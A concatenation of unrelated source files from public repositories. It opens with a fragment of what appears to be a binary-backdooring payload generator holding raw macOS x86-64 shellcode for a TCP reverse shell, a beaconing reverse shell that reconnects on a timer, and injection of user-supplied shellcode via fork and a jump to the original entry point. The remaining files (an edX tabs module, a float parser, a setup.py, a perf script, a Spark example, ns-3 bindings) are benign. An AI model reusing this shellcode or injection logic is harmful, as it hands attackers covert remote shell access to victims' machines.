"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x6c\x00\x00\x00"
#self.shellcode1 = "\xe9\x6c\x00\x00\x00"
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
#TIME CHECK
self.shellcode2 += "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
"\xe9\x60\xff\xff\xff\xff" # jmp back to FORK
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def user_supplied_shellcode(self):
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = supplied_shellcode
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
|
olexiim/edx-platform
|
refs/heads/master
|
lms/djangoapps/courseware/tabs.py
|
8
|
"""
This module is essentially a broker to xmodule/tabs.py -- it was originally introduced to
perform some LMS-specific tab display gymnastics for the Entrance Exams feature
"""
from django.conf import settings
from django.utils.translation import ugettext as _
from courseware.access import has_access
from student.models import CourseEnrollment
from xmodule.tabs import CourseTabList
if settings.FEATURES.get('MILESTONES_APP', False):
from milestones.api import get_course_milestones_fulfillment_paths
from util.milestones_helpers import serialize_user
def get_course_tab_list(course, user):
"""
Retrieves the course tab list from xmodule.tabs and manipulates the set as necessary
"""
user_is_enrolled = user.is_authenticated() and CourseEnrollment.is_enrolled(user, course.id)
xmodule_tab_list = CourseTabList.iterate_displayable(
course,
settings,
user.is_authenticated(),
has_access(user, 'staff', course, course.id),
user_is_enrolled
)
# Entrance Exams Feature
# If the course has an entrance exam, we'll need to see if the user has not passed it
# If so, we'll need to hide away all of the tabs except for Courseware and Instructor
entrance_exam_mode = False
if settings.FEATURES.get('ENTRANCE_EXAMS', False):
if getattr(course, 'entrance_exam_enabled', False):
course_milestones_paths = get_course_milestones_fulfillment_paths(
unicode(course.id),
serialize_user(user)
)
for __, value in course_milestones_paths.iteritems():
if len(value.get('content', [])):
for content in value['content']:
if content == course.entrance_exam_id:
entrance_exam_mode = True
break
# Now that we've loaded the tabs for this course, perform the Entrance Exam mode work
# Majority case is no entrance exam defined
course_tab_list = []
for tab in xmodule_tab_list:
if entrance_exam_mode:
# Hide all of the tabs except for 'Courseware' and 'Instructor'
# Rename 'Courseware' tab to 'Entrance Exam'
if tab.type not in ['courseware', 'instructor']:
continue
if tab.type == 'courseware':
tab.name = _("Entrance Exam")
course_tab_list.append(tab)
return course_tab_list
|
ustramooner/CouchPotato
|
refs/heads/NzbIndexCom
|
library/hachoir_core/field/float.py
|
84
|
from hachoir_core.field import Bit, Bits, FieldSet
from hachoir_core.endian import BIG_ENDIAN, LITTLE_ENDIAN
import struct
# Make sure that we use right struct types
assert struct.calcsize("f") == 4
assert struct.calcsize("d") == 8
assert struct.unpack("<d", "\x1f\x85\xebQ\xb8\x1e\t@")[0] == 3.14
assert struct.unpack(">d", "\xc0\0\0\0\0\0\0\0")[0] == -2.0
class FloatMantissa(Bits):
def createValue(self):
value = Bits.createValue(self)
return 1 + float(value) / (2 ** self.size)
def createRawDisplay(self):
return unicode(Bits.createValue(self))
class FloatExponent(Bits):
def __init__(self, parent, name, size):
Bits.__init__(self, parent, name, size)
self.bias = 2 ** (size-1) - 1
def createValue(self):
return Bits.createValue(self) - self.bias
def createRawDisplay(self):
return unicode(self.value + self.bias)
def floatFactory(name, format, mantissa_bits, exponent_bits, doc):
size = 1 + mantissa_bits + exponent_bits
class Float(FieldSet):
static_size = size
__doc__ = doc
def __init__(self, parent, name, description=None):
assert parent.endian in (BIG_ENDIAN, LITTLE_ENDIAN)
FieldSet.__init__(self, parent, name, description, size)
if format:
if self._parent.endian == BIG_ENDIAN:
self.struct_format = ">"+format
else:
self.struct_format = "<"+format
else:
self.struct_format = None
def createValue(self):
"""
Create float value: use struct.unpack() when it's possible
(32 and 64-bit float) or compute it with :
mantissa * (2.0 ** exponent)
This computation may raise an OverflowError.
"""
if self.struct_format:
raw = self._parent.stream.readBytes(
self.absolute_address, self._size//8)
try:
return struct.unpack(self.struct_format, raw)[0]
except struct.error, err:
raise ValueError("[%s] conversion error: %s" %
(self.__class__.__name__, err))
else:
try:
value = self["mantissa"].value * (2.0 ** float(self["exponent"].value))
if self["negative"].value:
return -(value)
else:
return value
except OverflowError:
raise ValueError("[%s] floating point overflow" %
self.__class__.__name__)
def createFields(self):
yield Bit(self, "negative")
yield FloatExponent(self, "exponent", exponent_bits)
if 64 <= mantissa_bits:
yield Bit(self, "one")
yield FloatMantissa(self, "mantissa", mantissa_bits-1)
else:
yield FloatMantissa(self, "mantissa", mantissa_bits)
cls = Float
cls.__name__ = name
return cls
# 32-bit float (standard: IEEE 754/854)
Float32 = floatFactory("Float32", "f", 23, 8,
"Floating point number: format IEEE 754 int 32 bit")
# 64-bit float (standard: IEEE 754/854)
Float64 = floatFactory("Float64", "d", 52, 11,
"Floating point number: format IEEE 754 in 64 bit")
# 80-bit float (standard: IEEE 754/854)
Float80 = floatFactory("Float80", None, 64, 15,
"Floating point number: format IEEE 754 in 80 bit")
|
ALSchwalm/python-prompt-toolkit
|
refs/heads/master
|
setup.py
|
1
|
#!/usr/bin/env python
import os
from setuptools import setup, find_packages
long_description = open(
os.path.join(
os.path.dirname(__file__),
'README.rst'
)
).read()
setup(
name='prompt_toolkit',
author='Jonathan Slenders',
version='0.47',
license='LICENSE.txt',
url='https://github.com/jonathanslenders/python-prompt-toolkit',
description='Library for building powerful interactive command lines in Python',
long_description=long_description,
packages=find_packages('.'),
install_requires = [
'pygments',
'six>=1.9.0',
'wcwidth',
],
)
|
jamesjjliao/linux
|
refs/heads/v4.2-rc2-clk
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/EventClass.py
|
4653
|
# EventClass.py
#
# This is a library defining some events types classes, which could
# be used by other scripts to analyzing the perf samples.
#
# Currently there are just a few classes defined for examples,
# PerfEvent is the base class for all perf event sample, PebsEvent
# is a HW base Intel x86 PEBS event, and user could add more SW/HW
# event classes based on requirements.
import struct
# Event types, user could add more here
EVTYPE_GENERIC = 0
EVTYPE_PEBS = 1 # Basic PEBS event
EVTYPE_PEBS_LL = 2 # PEBS event with load latency info
EVTYPE_IBS = 3
#
# Currently we don't have good way to tell the event type, but by
# the size of raw buffer, raw PEBS event with load latency data's
# size is 176 bytes, while the pure PEBS event's size is 144 bytes.
#
def create_event(name, comm, dso, symbol, raw_buf):
if (len(raw_buf) == 144):
event = PebsEvent(name, comm, dso, symbol, raw_buf)
elif (len(raw_buf) == 176):
event = PebsNHM(name, comm, dso, symbol, raw_buf)
else:
event = PerfEvent(name, comm, dso, symbol, raw_buf)
return event
class PerfEvent(object):
event_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_GENERIC):
self.name = name
self.comm = comm
self.dso = dso
self.symbol = symbol
self.raw_buf = raw_buf
self.ev_type = ev_type
PerfEvent.event_num += 1
def show(self):
print "PMU event: name=%12s, symbol=%24s, comm=%8s, dso=%12s" % (self.name, self.symbol, self.comm, self.dso)
#
# Basic Intel PEBS (Precise Event-based Sampling) event, whose raw buffer
# contains the context info when that event happened: the EFLAGS and
# linear IP info, as well as all the registers.
#
class PebsEvent(PerfEvent):
pebs_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS):
tmp_buf=raw_buf[0:80]
flags, ip, ax, bx, cx, dx, si, di, bp, sp = struct.unpack('QQQQQQQQQQ', tmp_buf)
self.flags = flags
self.ip = ip
self.ax = ax
self.bx = bx
self.cx = cx
self.dx = dx
self.si = si
self.di = di
self.bp = bp
self.sp = sp
PerfEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
PebsEvent.pebs_num += 1
del tmp_buf
#
# Intel Nehalem and Westmere support PEBS plus Load Latency info which lie
# in the four 64 bit words write after the PEBS data:
# Status: records the IA32_PERF_GLOBAL_STATUS register value
# DLA: Data Linear Address (EIP)
# DSE: Data Source Encoding, where the latency happens, hit or miss
# in L1/L2/L3 or IO operations
# LAT: the actual latency in cycles
#
class PebsNHM(PebsEvent):
pebs_nhm_num = 0
def __init__(self, name, comm, dso, symbol, raw_buf, ev_type=EVTYPE_PEBS_LL):
tmp_buf=raw_buf[144:176]
status, dla, dse, lat = struct.unpack('QQQQ', tmp_buf)
self.status = status
self.dla = dla
self.dse = dse
self.lat = lat
PebsEvent.__init__(self, name, comm, dso, symbol, raw_buf, ev_type)
PebsNHM.pebs_nhm_num += 1
del tmp_buf
|
spark-test/spark
|
refs/heads/master
|
examples/src/main/python/mllib/summary_statistics_example.py
|
128
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark import SparkContext
# $example on$
import numpy as np
from pyspark.mllib.stat import Statistics
# $example off$
if __name__ == "__main__":
sc = SparkContext(appName="SummaryStatisticsExample") # SparkContext
# $example on$
mat = sc.parallelize(
[np.array([1.0, 10.0, 100.0]), np.array([2.0, 20.0, 200.0]), np.array([3.0, 30.0, 300.0])]
) # an RDD of Vectors
# Compute column summary statistics.
summary = Statistics.colStats(mat)
print(summary.mean()) # a dense vector containing the mean value for each column
print(summary.variance()) # column-wise variance
print(summary.numNonzeros()) # number of nonzeros in each column
# $example off$
sc.stop()
|
avicizhu/Load-balancer
|
refs/heads/master
|
src/propagation/bindings/modulegen__gcc_LP64.py
|
10
|
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.propagation', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## propagation-environment.h (module 'propagation'): ns3::CitySize [enumeration]
module.add_enum('CitySize', ['SmallCity', 'MediumCity', 'LargeCity'])
## propagation-environment.h (module 'propagation'): ns3::EnvironmentType [enumeration]
module.add_enum('EnvironmentType', ['UrbanEnvironment', 'SubUrbanEnvironment', 'OpenAreasEnvironment'])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## propagation-cache.h (module 'propagation'): ns3::PropagationCache<ns3::JakesProcess> [class]
module.add_class('PropagationCache', template_parameters=['ns3::JakesProcess'])
## random-variable.h (module 'core'): ns3::RandomVariable [class]
module.add_class('RandomVariable', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::SeedManager [class]
module.add_class('SeedManager', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::SequentialVariable [class]
module.add_class('SequentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## random-variable.h (module 'core'): ns3::TriangularVariable [class]
module.add_class('TriangularVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## random-variable.h (module 'core'): ns3::UniformVariable [class]
module.add_class('UniformVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## vector.h (module 'core'): ns3::Vector2D [class]
module.add_class('Vector2D', import_from_module='ns.core')
## vector.h (module 'core'): ns3::Vector3D [class]
module.add_class('Vector3D', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::WeibullVariable [class]
module.add_class('WeibullVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZetaVariable [class]
module.add_class('ZetaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ZipfVariable [class]
module.add_class('ZipfVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## random-variable.h (module 'core'): ns3::ConstantVariable [class]
module.add_class('ConstantVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::DeterministicVariable [class]
module.add_class('DeterministicVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::EmpiricalVariable [class]
module.add_class('EmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ErlangVariable [class]
module.add_class('ErlangVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::ExponentialVariable [class]
module.add_class('ExponentialVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::GammaVariable [class]
module.add_class('GammaVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable [class]
module.add_class('IntEmpiricalVariable', import_from_module='ns.core', parent=root_module['ns3::EmpiricalVariable'])
## random-variable.h (module 'core'): ns3::LogNormalVariable [class]
module.add_class('LogNormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## random-variable.h (module 'core'): ns3::NormalVariable [class]
module.add_class('NormalVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## random-variable.h (module 'core'): ns3::ParetoVariable [class]
module.add_class('ParetoVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariable'])
## propagation-delay-model.h (module 'propagation'): ns3::PropagationDelayModel [class]
module.add_class('PropagationDelayModel', parent=root_module['ns3::Object'])
## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel [class]
module.add_class('PropagationLossModel', parent=root_module['ns3::Object'])
## propagation-delay-model.h (module 'propagation'): ns3::RandomPropagationDelayModel [class]
module.add_class('RandomPropagationDelayModel', parent=root_module['ns3::PropagationDelayModel'])
## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel [class]
module.add_class('RandomPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel [class]
module.add_class('RangePropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel [class]
module.add_class('ThreeLogDistancePropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel [class]
module.add_class('TwoRayGroundPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## propagation-delay-model.h (module 'propagation'): ns3::ConstantSpeedPropagationDelayModel [class]
module.add_class('ConstantSpeedPropagationDelayModel', parent=root_module['ns3::PropagationDelayModel'])
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel [class]
module.add_class('Cost231PropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## cost231-propagation-loss-model.h (module 'propagation'): ns3::Cost231PropagationLossModel::Environment [enumeration]
module.add_enum('Environment', ['SubUrban', 'MediumCity', 'Metropolitan'], outer_class=root_module['ns3::Cost231PropagationLossModel'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## propagation-loss-model.h (module 'propagation'): ns3::FixedRssLossModel [class]
module.add_class('FixedRssLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::FriisPropagationLossModel [class]
module.add_class('FriisPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## itu-r-1411-los-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411LosPropagationLossModel [class]
module.add_class('ItuR1411LosPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## itu-r-1411-nlos-over-rooftop-propagation-loss-model.h (module 'propagation'): ns3::ItuR1411NlosOverRooftopPropagationLossModel [class]
module.add_class('ItuR1411NlosOverRooftopPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## jakes-process.h (module 'propagation'): ns3::JakesProcess [class]
module.add_class('JakesProcess', parent=root_module['ns3::Object'])
## jakes-propagation-loss-model.h (module 'propagation'): ns3::JakesPropagationLossModel [class]
module.add_class('JakesPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## kun-2600-mhz-propagation-loss-model.h (module 'propagation'): ns3::Kun2600MhzPropagationLossModel [class]
module.add_class('Kun2600MhzPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::LogDistancePropagationLossModel [class]
module.add_class('LogDistancePropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## propagation-loss-model.h (module 'propagation'): ns3::MatrixPropagationLossModel [class]
module.add_class('MatrixPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## mobility-model.h (module 'mobility'): ns3::MobilityModel [class]
module.add_class('MobilityModel', import_from_module='ns.mobility', parent=root_module['ns3::Object'])
## propagation-loss-model.h (module 'propagation'): ns3::NakagamiPropagationLossModel [class]
module.add_class('NakagamiPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## okumura-hata-propagation-loss-model.h (module 'propagation'): ns3::OkumuraHataPropagationLossModel [class]
module.add_class('OkumuraHataPropagationLossModel', parent=root_module['ns3::PropagationLossModel'])
## random-variable.h (module 'core'): ns3::RandomVariableChecker [class]
module.add_class('RandomVariableChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## random-variable.h (module 'core'): ns3::RandomVariableValue [class]
module.add_class('RandomVariableValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## nstime.h (module 'core'): ns3::TimeChecker [class]
module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
